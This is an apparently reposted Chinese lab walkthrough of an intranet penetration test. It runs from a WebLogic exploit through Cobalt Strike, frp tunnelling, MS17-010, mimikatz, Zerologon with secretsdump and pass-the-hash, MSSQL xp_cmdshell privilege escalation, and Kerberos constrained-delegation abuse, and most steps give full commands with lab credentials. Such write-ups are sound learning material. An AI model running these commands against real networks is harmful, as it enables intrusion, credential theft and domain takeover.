记一次内网靶场学习

admin 2022年2月7日14:44:36评论67 views字数 3744阅读12分28秒阅读模式

环境搭建

web服务器:

外网IP 192.160.0.100

内网IP 10.10.20.12

域内机器win7 :

内网IP 10.10.20.7

内网IP 10.10.10.7

域内服务器 Mssql:

内网IP 10.10.10.18

域控机器:

内网IP 10.10.10.8

外网渗透

端口扫描

搭建好环境,对目标192.168.0.100进行端口扫描探测


记一次内网靶场学习



目录扫描

发现目标开放了7001端口,进行目录扫描探测,发现weblogic登录口

记一次内网靶场学习

weblogic漏洞利用

记一次内网靶场学习

尝试weblogic弱口令登录不成功



记一次内网靶场学习



通过weblogic漏洞利用工具,发现目标存在CVE-2020-2551漏洞可以利用



记一次内网靶场学习



出网探测

ping www.baidu.com发现目标机器出网

记一次内网靶场学习

杀软识别

tasklist /svc 通过进程对比发现主机上没有安装杀软

记一次内网靶场学习

直接powershell上线cs



记一次内网靶场学习




记一次内网靶场学习



内网渗透

信息搜集

通过执行命令whoami /all发现存在双网卡

记一次内网靶场学习

密码凭据抓取

通过hashdump抓取密码Administrator ccef208c6485269c20db2cad21734fe7


记一次内网靶场学习



ntlm hash值为ccef208c6485269c20db2cad21734fe7,通过cmd5解出明文密码Admin12345



记一次内网靶场学习



横向移动

有了明文密码我们可以进行远程登陆,但真实环境中不到万不得已一般不建议执行此操作,因此寻找其他的方法进行内网横向移动

通过上传fscan扫描10网段,发现存在ms17-010漏洞的10.10.20.7主机


记一次内网靶场学习




一开始打算通过Eternalblue直接上线cs,发现不成功,改用其他方法

项目地址:https://github.com/0xFenrik/Eternalblue


记一次内网靶场学习


隧道搭建

上传frp搭建隧道代理

[common]#frpc配置
server_addr = VPS地址
server_port = 7000
[plugin_socks]
type = tcp
remote_port = 1080
plugin = socks5

[common]#frps配置
bind_addr =0.0.0.0
bind_port = 7000

永恒之蓝ms17-010

改用metaspolit,调用永恒之蓝模块进行攻击,成功获取shell

msf6 > setg Proxies socks5:frps服务端IP:监听端口
msf6 > setg ReverseAllowProxy true
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set payload windows/x64/meterpreter/bind_tcp
msf6 > set rhost 10.10.20.7
msf6 > run

或者vi /etc/proxychains.conf修改配置文件socks5 127.0.0.1 1080

记一次内网靶场学习

然后通过proxychains msfconsole启动



记一次内网靶场学习



成功后通过mimikatz执行creds_all获取账户密码redteamsaul:admin!@#45

记一次内网靶场学习


中转上线

由于目标机器win7不出网,因此以跳板机器作为中转,新建一个监听器

记一次内网靶场学习


通过psexec进行上线



记一次内网靶场学习



成功上线后进行内网扫描,探测存活主机,发现还存在10.10.10.810.10.10.18两台机器



记一次内网靶场学习




通过信息搜集发现当前机器是在域环境内net user /domain



记一次内网靶场学习



定位域控

接着定位到域控 net group "domain controllers" /domain

记一次内网靶场学习

ps:一般来说DNS服务器就是域控



记一次内网靶场学习




CVE-2020-1472

影响版本:

Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)

通过CVE-2020-1472脚本进行检测

项目地址:https://github.com/SecuraBV/CVE-2020-1472


记一次内网靶场学习



1、重置管理员密钥,进行置空

python3 cve-2020-1472-exploit.py OWA 10.10.10.8


记一次内网靶场学习



2、通过 Dcsync 查看密码hash

python secretsdump.py redteam.red/[email protected] -just-dc -no-pass

记一次内网靶场学习

3、通过psexec和hash获取域控权限

python psexec.py [email protected] -hashes aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7

记一次内网靶场学习

4、使用secretsdump解析保存在本地的nt hash

reg save HKLMSAM sam.save
reg save HKLMSYSTEM system.save
reg save HKLMSECURITY security.save

python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

记一次内网靶场学习


记一次内网靶场学习



约束委派接管域控

1、通过adfind寻找约束委派的用户,发现为sqlserver的机器

AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto


记一次内网靶场学习


2、通过端口探测发现sqlserver为10.10.10.18机器



记一次内网靶场学习



3、使用fscan进行扫描fscan.exe -h 10.10.10.0/24 sqlserver为弱口令sa/sa



记一次内网靶场学习




记一次内网靶场学习




4、使用工具查看当前权限SharpSQLTools.exe 10.10.10.18 sa sa master xp_cmdshell whoami

项目地址:https://github.com/uknowsec/SharpSQLTools/releases/tag/41


记一次内网靶场学习



5、权限较低,使用以下命令进行提权:

SharpSQLTools.exe 10.10.10.18 sa sa master install_clr whoami
SharpSQLTools.exe 10.10.10.18 sa sa master enable_clr
SharpSQLTools.exe 10.10.10.18 sa sa master clr_efspotato whoami


记一次内网靶场学习




记一次内网靶场学习



6、上线CS并抓到sqlserver的密码redteamsqlserver Server12345



记一次内网靶场学习




记一次内网靶场学习



根据先前的信息搜集可知 sqlserver 是一个约束委派用户,可以通过约束委派攻击来接管域控

项目地址:https://github.com/gentilkiwi/kekeo/releases

1、利用 kekeo 请求该用户的 TGT

kekeo.exe "tgt::ask /user:sqlserver /domain:redteam.red /password:Server12345 /ticket:administrator.kirbi"

记一次内网靶场学习


2、然后使用这张 TGT 获取域机器的 ST

kekeo.exe "tgs::s4u /tgt: [email protected][email protected] /user:[email protected] /service:cifs/owa.redteam.red"


记一次内网靶场学习




记一次内网靶场学习




3、使用 mimikatz 将 ST 导入当前会话,运行 mimikatz 进行 ptt

mimikatz kerberos::ptt [email protected]@[email protected]


记一次内网靶场学习



4、成功获取域控权限



记一次内网靶场学习



来源:先知 

注:如有侵权请联系删除



记一次内网靶场学习

欢迎大家加群一起讨论学习和交流
(此群已满200人,需要添加群主邀请)

记一次内网靶场学习

最好的状态是未来可期。



原文始发于微信公众号(衡阳信安):记一次内网靶场学习

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年2月7日14:44:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次内网靶场学习https://cn-sec.com/archives/766791.html

发表评论

匿名网友 填写信息